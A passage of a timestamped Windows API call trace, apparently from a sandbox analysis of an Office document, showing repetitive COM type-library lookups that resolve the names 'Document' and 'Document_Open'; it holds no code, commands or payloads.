ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xda, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xde, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xea, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xeb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xec, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xed, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xee, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xef, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.168] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.168] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.169] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6bc8 | out: ppvObject=0x33e4fb6bc8*=0x1d39d552a68) returned 0x0 [0060.169] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6bd8 | out: pVarVal=0x33e4fb6bd8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b9, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.169] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.169] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6bd0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6ae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.169] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.169] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6b80 | out: ppvObject=0x33e4fb6b80*=0x0) returned 0x80004002 [0060.169] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb6ba8, pDummy=0x33e4fb6b80 | out: ppTypeAttr=0x33e4fb6ba8, pDummy=0x33e4fb6b80*=0x0) returned 0x0 [0060.169] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.169] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a9630, cb=0x62) returned 0x1d39d8481b0 [0060.169] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x4 [0060.169] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.169] IUnknown:Release (This=0x1d39d552bc8) returned 0x3 [0060.169] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.169] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552bc8, memid=5, refPtrFlags=0xe4fb6f60, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000) returned 0x0 [0060.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x33e4fb6fb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5 [0060.169] _mbscpy_s (in: _Dst=0x33e4fb6e00, _DstSizeInBytes=0xe, _Src=0x1d3a32b2b3a | out: _Dst=0x33e4fb6e00) returned 0x0 [0060.169] _mbscpy_s (in: _Dst=0x33e4fb6e09, _DstSizeInBytes=0x5, _Src=0x33e4fb6fb0 | out: _Dst=0x33e4fb6e09) returned 0x0 [0060.169] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document_Open") returned 0x5089c1 [0060.170] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a97b0 [0060.171] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb66a0 | out: ppvObject=0x33e4fb66a0*=0x0) returned 0x80004002 [0060.171] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb65e8 | out: ppvObject=0x33e4fb65e8*=0x1d39d552a68) returned 0x0 [0060.172] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb65f8 | out: pVarVal=0x33e4fb65f8*(varType=0x0, wReserved1=0xe4fb, wReserved2=0x33, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.172] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.172] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb65f0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6610 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6610*="") returned 0x0 [0060.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6500, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.172] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.172] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb65f0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb65f0, pDummy=0x0) returned 0x0 [0060.172] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.172] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.172] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x10, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x11, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x12, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x13, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x14, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x15, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x16, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x17, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x18, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x19, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x20, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x21, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.173] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.173] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x22, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.174] 